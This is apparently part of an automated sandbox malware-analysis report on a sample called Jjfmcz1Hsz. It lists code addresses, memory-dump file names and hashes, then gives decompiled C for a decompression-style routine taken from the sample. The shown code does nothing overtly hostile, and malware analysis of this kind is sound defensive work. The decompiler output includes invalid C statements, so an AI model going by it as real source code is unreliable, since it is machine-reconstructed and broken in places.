                                                                                                                                                                            0x004067ac
                                                                                                                                                                            0x004067ae
                                                                                                                                                                            0x004067b0
                                                                                                                                                                            0x004067b2
                                                                                                                                                                            0x004067b5
                                                                                                                                                                            0x004067b6
                                                                                                                                                                            0x004067b8
                                                                                                                                                                            0x004067ba
                                                                                                                                                                            0x004067bd
                                                                                                                                                                            0x004067c0
                                                                                                                                                                            0x004067d6
                                                                                                                                                                            0x004067d6
                                                                                                                                                                            0x004067db
                                                                                                                                                                            0x00406813
                                                                                                                                                                            0x00406813
                                                                                                                                                                            0x00406817
                                                                                                                                                                            0x00406840
                                                                                                                                                                            0x00406843
                                                                                                                                                                            0x00406845
                                                                                                                                                                            0x0040684c
                                                                                                                                                                            0x0040684f
                                                                                                                                                                            0x00406852
                                                                                                                                                                            0x00406852
                                                                                                                                                                            0x00406857
                                                                                                                                                                            0x00406857
                                                                                                                                                                            0x00406859
                                                                                                                                                                            0x0040685c
                                                                                                                                                                            0x00406863
                                                                                                                                                                            0x00406866
                                                                                                                                                                            0x00406893
                                                                                                                                                                            0x00406893
                                                                                                                                                                            0x00406896
                                                                                                                                                                            0x00406899
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x0040689b
                                                                                                                                                                            0x0040689b
                                                                                                                                                                            0x004068a1
                                                                                                                                                                            0x004068a4
                                                                                                                                                                            0x004068a7
                                                                                                                                                                            0x004068aa
                                                                                                                                                                            0x004068ad
                                                                                                                                                                            0x004068b0
                                                                                                                                                                            0x004068b3
                                                                                                                                                                            0x004068b6
                                                                                                                                                                            0x004068b9
                                                                                                                                                                            0x004068bc
                                                                                                                                                                            0x004068d5
                                                                                                                                                                            0x004068d7
                                                                                                                                                                            0x004068da
                                                                                                                                                                            0x004068db
                                                                                                                                                                            0x004068de
                                                                                                                                                                            0x004068e0
                                                                                                                                                                            0x004068e3
                                                                                                                                                                            0x004068e5
                                                                                                                                                                            0x004068e7
                                                                                                                                                                            0x004068ea
                                                                                                                                                                            0x004068ec
                                                                                                                                                                            0x004068ef
                                                                                                                                                                            0x004068f3
                                                                                                                                                                            0x004068f5
                                                                                                                                                                            0x004068f5
                                                                                                                                                                            0x004068f6
                                                                                                                                                                            0x004068f9
                                                                                                                                                                            0x004068fc
                                                                                                                                                                            0x004068be
                                                                                                                                                                            0x004068be
                                                                                                                                                                            0x004068c6
                                                                                                                                                                            0x004068cb
                                                                                                                                                                            0x004068cd
                                                                                                                                                                            0x004068d0
                                                                                                                                                                            0x004068d0
                                                                                                                                                                            0x004068ff
                                                                                                                                                                            0x00406906
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406908
                                                                                                                                                                            0x00406908
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406908
                                                                                                                                                                            0x00406906
                                                                                                                                                                            0x00406819
                                                                                                                                                                            0x00406819
                                                                                                                                                                            0x0040681c
                                                                                                                                                                            0x0040681e
                                                                                                                                                                            0x00406821
                                                                                                                                                                            0x00406824
                                                                                                                                                                            0x00406827
                                                                                                                                                                            0x00406829
                                                                                                                                                                            0x0040682c
                                                                                                                                                                            0x0040682f
                                                                                                                                                                            0x0040682f
                                                                                                                                                                            0x00406832
                                                                                                                                                                            0x00406832
                                                                                                                                                                            0x00406835
                                                                                                                                                                            0x0040683c
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040683e
                                                                                                                                                                            0x0040683e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040683e
                                                                                                                                                                            0x0040683c
                                                                                                                                                                            0x004067c2
                                                                                                                                                                            0x004067c2
                                                                                                                                                                            0x004067c5
                                                                                                                                                                            0x004067c7
                                                                                                                                                                            0x004067ca
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406529
                                                                                                                                                                            0x00406529
                                                                                                                                                                            0x0040652d
                                                                                                                                                                            0x00406b72
                                                                                                                                                                            0x00406b72
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b72
                                                                                                                                                                            0x00406533
                                                                                                                                                                            0x00406533
                                                                                                                                                                            0x00406536
                                                                                                                                                                            0x00406539
                                                                                                                                                                            0x0040653c
                                                                                                                                                                            0x0040653f
                                                                                                                                                                            0x00406542
                                                                                                                                                                            0x00406545
                                                                                                                                                                            0x00406547
                                                                                                                                                                            0x0040654a
                                                                                                                                                                            0x0040654d
                                                                                                                                                                            0x00406550
                                                                                                                                                                            0x00406552
                                                                                                                                                                            0x00406552
                                                                                                                                                                            0x00406552
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004066b4
                                                                                                                                                                            0x004066b4
                                                                                                                                                                            0x004066b8
                                                                                                                                                                            0x00406b7e
                                                                                                                                                                            0x00406b7e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b7e
                                                                                                                                                                            0x004066be
                                                                                                                                                                            0x004066be
                                                                                                                                                                            0x004066c1
                                                                                                                                                                            0x004066c4
                                                                                                                                                                            0x004066c7
                                                                                                                                                                            0x004066c9
                                                                                                                                                                            0x004066c9
                                                                                                                                                                            0x004066c9
                                                                                                                                                                            0x004066cc
                                                                                                                                                                            0x004066cf
                                                                                                                                                                            0x004066d2
                                                                                                                                                                            0x004066d5
                                                                                                                                                                            0x004066d8
                                                                                                                                                                            0x004066db
                                                                                                                                                                            0x004066dc
                                                                                                                                                                            0x004066de
                                                                                                                                                                            0x004066de
                                                                                                                                                                            0x004066de
                                                                                                                                                                            0x004066e1
                                                                                                                                                                            0x004066e4
                                                                                                                                                                            0x004066e7
                                                                                                                                                                            0x004066ea
                                                                                                                                                                            0x004066ea
                                                                                                                                                                            0x004066ea
                                                                                                                                                                            0x004066ed
                                                                                                                                                                            0x004066ef
                                                                                                                                                                            0x004066ef
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406935
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040693b
                                                                                                                                                                            0x0040693b
                                                                                                                                                                            0x0040693e
                                                                                                                                                                            0x00406941
                                                                                                                                                                            0x00406944
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406949
                                                                                                                                                                            0x0040694c
                                                                                                                                                                            0x0040694f
                                                                                                                                                                            0x00406952
                                                                                                                                                                            0x00406955
                                                                                                                                                                            0x00406958
                                                                                                                                                                            0x00406959
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695e
                                                                                                                                                                            0x00406961
                                                                                                                                                                            0x00406964
                                                                                                                                                                            0x00406967
                                                                                                                                                                            0x0040696a
                                                                                                                                                                            0x0040696e
                                                                                                                                                                            0x00406970
                                                                                                                                                                            0x00406973
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406975
                                                                                                                                                                            0x00406975
                                                                                                                                                                            0x004066f2
                                                                                                                                                                            0x004066f2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004066f2
                                                                                                                                                                            0x00406973
                                                                                                                                                                            0x00406ba8
                                                                                                                                                                            0x00406ba8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061d7
                                                                                                                                                                            0x00406bdf
                                                                                                                                                                            0x00406bdf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406bdf
                                                                                                                                                                            0x00406a2c
                                                                                                                                                                            0x00406aac
                                                                                                                                                                            0x00406a75

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b4bbaf917c5b2b4b29eca7dd879fe0279583c9caa0a8680a3fb668f2eecfa979
                                                                                                                                                                            • Instruction ID: ac331763182a67db8ffe8b732b67c8974d54266b30473341b06133cd37c0d4bc
                                                                                                                                                                            • Opcode Fuzzy Hash: b4bbaf917c5b2b4b29eca7dd879fe0279583c9caa0a8680a3fb668f2eecfa979
                                                                                                                                                                            • Instruction Fuzzy Hash: ECA13171E00229CBDF28DFA8C8547ADBBB1FB44305F11816ED816BB281C7786A96CF44
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                            			E0040697A() {
                                                                                                                                                                            				void _t533;
                                                                                                                                                                            				signed int _t534;
                                                                                                                                                                            				signed int _t535;
                                                                                                                                                                            				signed int* _t605;
                                                                                                                                                                            				void* _t612;
                                                                                                                                                                            
                                                                                                                                                                            				L0:
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L0:
                                                                                                                                                                            					if( *(_t612 - 0x40) != 0) {
                                                                                                                                                                            						 *(_t612 - 0x84) = 0x13;
                                                                                                                                                                            						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                                                                                                                            						goto L132;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						__eax =  *(__ebp - 0x4c);
                                                                                                                                                                            						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                            						__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            						__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                            						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                            						L130:
                                                                                                                                                                            						 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            						 *(__ebp - 0x40) = 3;
                                                                                                                                                                            						L144:
                                                                                                                                                                            						 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                            						L145:
                                                                                                                                                                            						__eax =  *(__ebp - 0x40);
                                                                                                                                                                            						 *(__ebp - 0x50) = 1;
                                                                                                                                                                            						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                            						L149:
                                                                                                                                                                            						if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                            							__ecx =  *(__ebp - 0x40);
                                                                                                                                                                            							__ebx =  *(__ebp - 0x50);
                                                                                                                                                                            							0 = 1;
                                                                                                                                                                            							__eax = 1 << __cl;
                                                                                                                                                                            							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                            							__eax =  *(__ebp - 0x7c);
                                                                                                                                                                            							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								L140:
                                                                                                                                                                            								 *(_t612 - 0x88) = _t533;
                                                                                                                                                                            								while(1) {
                                                                                                                                                                            									L1:
                                                                                                                                                                            									_t534 =  *(_t612 - 0x88);
                                                                                                                                                                            									if(_t534 > 0x1c) {
                                                                                                                                                                            										break;
                                                                                                                                                                            									}
                                                                                                                                                                            									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BE7))) {
                                                                                                                                                                            										case 0:
                                                                                                                                                                            											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                                            											_t534 =  *( *(_t612 - 0x70));
                                                                                                                                                                            											if(_t534 > 0xe1) {
                                                                                                                                                                            												goto L171;
                                                                                                                                                                            											}
                                                                                                                                                                            											_t538 = _t534 & 0x000000ff;
                                                                                                                                                                            											_push(0x2d);
                                                                                                                                                                            											asm("cdq");
                                                                                                                                                                            											_pop(_t569);
                                                                                                                                                                            											_push(9);
                                                                                                                                                                            											_pop(_t570);
                                                                                                                                                                            											_t608 = _t538 / _t569;
                                                                                                                                                                            											_t540 = _t538 % _t569 & 0x000000ff;
                                                                                                                                                                            											asm("cdq");
                                                                                                                                                                            											_t603 = _t540 % _t570 & 0x000000ff;
                                                                                                                                                                            											 *(_t612 - 0x3c) = _t603;
                                                                                                                                                                            											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                                                                                                                            											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                                                                                                                            											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                                                                                                                            											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                                                                                                                            												L10:
                                                                                                                                                                            												if(_t611 == 0) {
                                                                                                                                                                            													L12:
                                                                                                                                                                            													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                                                                                                                            													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                                                                            													goto L15;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													goto L11;
                                                                                                                                                                            												}
                                                                                                                                                                            												do {
                                                                                                                                                                            													L11:
                                                                                                                                                                            													_t611 = _t611 - 1;
                                                                                                                                                                            													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                                                                                                                            												} while (_t611 != 0);
                                                                                                                                                                            												goto L12;
                                                                                                                                                                            											}
                                                                                                                                                                            											if( *(_t612 - 4) != 0) {
                                                                                                                                                                            												GlobalFree( *(_t612 - 4)); // executed
                                                                                                                                                                            											}
                                                                                                                                                                            											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                            											 *(_t612 - 4) = _t534;
                                                                                                                                                                            											if(_t534 == 0) {
                                                                                                                                                                            												goto L171;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                                                                                                                            												goto L10;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 1:
                                                                                                                                                                            											L13:
                                                                                                                                                                            											__eflags =  *(_t612 - 0x6c);
                                                                                                                                                                            											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                                            												 *(_t612 - 0x88) = 1;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                                            											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                                                                                                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                                            											_t45 = _t612 - 0x48;
                                                                                                                                                                            											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                                                                                                                            											__eflags =  *_t45;
                                                                                                                                                                            											L15:
                                                                                                                                                                            											if( *(_t612 - 0x48) < 4) {
                                                                                                                                                                            												goto L13;
                                                                                                                                                                            											}
                                                                                                                                                                            											_t546 =  *(_t612 - 0x40);
                                                                                                                                                                            											if(_t546 ==  *(_t612 - 0x74)) {
                                                                                                                                                                            												L20:
                                                                                                                                                                            												 *(_t612 - 0x48) = 5;
                                                                                                                                                                            												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                            												goto L23;
                                                                                                                                                                            											}
                                                                                                                                                                            											 *(_t612 - 0x74) = _t546;
                                                                                                                                                                            											if( *(_t612 - 8) != 0) {
                                                                                                                                                                            												GlobalFree( *(_t612 - 8)); // executed
                                                                                                                                                                            											}
                                                                                                                                                                            											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                                                                                                                            											 *(_t612 - 8) = _t534;
                                                                                                                                                                            											if(_t534 == 0) {
                                                                                                                                                                            												goto L171;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												goto L20;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 2:
                                                                                                                                                                            											L24:
                                                                                                                                                                            											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                                                                                                                            											 *(_t612 - 0x84) = 6;
                                                                                                                                                                            											 *(_t612 - 0x4c) = _t553;
                                                                                                                                                                            											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                                            											goto L132;
                                                                                                                                                                            										case 3:
                                                                                                                                                                            											L21:
                                                                                                                                                                            											__eflags =  *(_t612 - 0x6c);
                                                                                                                                                                            											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                                            												 *(_t612 - 0x88) = 3;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                                            											_t67 = _t612 - 0x70;
                                                                                                                                                                            											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                                            											__eflags =  *_t67;
                                                                                                                                                                            											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                                                                            											L23:
                                                                                                                                                                            											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                                                                                                                            											if( *(_t612 - 0x48) != 0) {
                                                                                                                                                                            												goto L21;
                                                                                                                                                                            											}
                                                                                                                                                                            											goto L24;
                                                                                                                                                                            										case 4:
                                                                                                                                                                            											L133:
                                                                                                                                                                            											_t531 =  *_t605;
                                                                                                                                                                            											_t588 = _t531 & 0x0000ffff;
                                                                                                                                                                            											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                                                                                                                            											if( *(_t612 - 0xc) >= _t564) {
                                                                                                                                                                            												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                                                                                                                            												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                                                                                                                            												 *(_t612 - 0x40) = 1;
                                                                                                                                                                            												_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                            												__eflags = _t532;
                                                                                                                                                                            												 *_t605 = _t532;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												 *(_t612 - 0x10) = _t564;
                                                                                                                                                                            												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                                                                            												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                                                                                                                            											}
                                                                                                                                                                            											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                                                                                                                            												goto L139;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												goto L137;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 5:
                                                                                                                                                                            											L137:
                                                                                                                                                                            											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                                            												 *(_t612 - 0x88) = 5;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                                                                                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                                            											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                                                                            											L139:
                                                                                                                                                                            											_t533 =  *(_t612 - 0x84);
                                                                                                                                                                            											goto L140;
                                                                                                                                                                            										case 6:
                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            												 *(__ebp - 0x34) = 1;
                                                                                                                                                                            												 *(__ebp - 0x84) = 7;
                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            												goto L132;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                            											__esi =  *(__ebp - 0x60);
                                                                                                                                                                            											__cl = 8;
                                                                                                                                                                            											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                            											__ecx =  *(__ebp - 4);
                                                                                                                                                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                            											if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                            												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                            													_t98 = __ebp - 0x38;
                                                                                                                                                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                            													__eflags =  *_t98;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                            												}
                                                                                                                                                                            											} else {
                                                                                                                                                                            												 *(__ebp - 0x38) = 0;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                            											if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                            												__ebx = 1;
                                                                                                                                                                            												goto L61;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 8);
                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                            												__ebx = 1;
                                                                                                                                                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                            												goto L41;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 7:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                            											if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                                                                                                            												 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                            												__eax =  *(__ebp - 0x28);
                                                                                                                                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                            												__eax = 0;
                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                            												__al = __al & 0x000000fd;
                                                                                                                                                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                            												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            												goto L69;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eax =  *(__ebp - 4);
                                                                                                                                                                            											__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            											 *(__ebp - 0x84) = 8;
                                                                                                                                                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            											goto L132;
                                                                                                                                                                            										case 8:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            												 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												__eax =  *(__ebp - 0x38);
                                                                                                                                                                            												__ecx =  *(__ebp - 4);
                                                                                                                                                                            												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                            												 *(__ebp - 0x84) = 9;
                                                                                                                                                                            												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                            												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                            											}
                                                                                                                                                                            											goto L132;
                                                                                                                                                                            										case 9:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												goto L90;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eflags =  *(__ebp - 0x60);
                                                                                                                                                                            											if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                            												goto L171;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                            											__eflags = _t259;
                                                                                                                                                                            											0 | _t259 = _t259 + _t259 + 9;
                                                                                                                                                                            											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                                                                            											goto L76;
                                                                                                                                                                            										case 0xa:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            												 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            												goto L132;
                                                                                                                                                                            											}
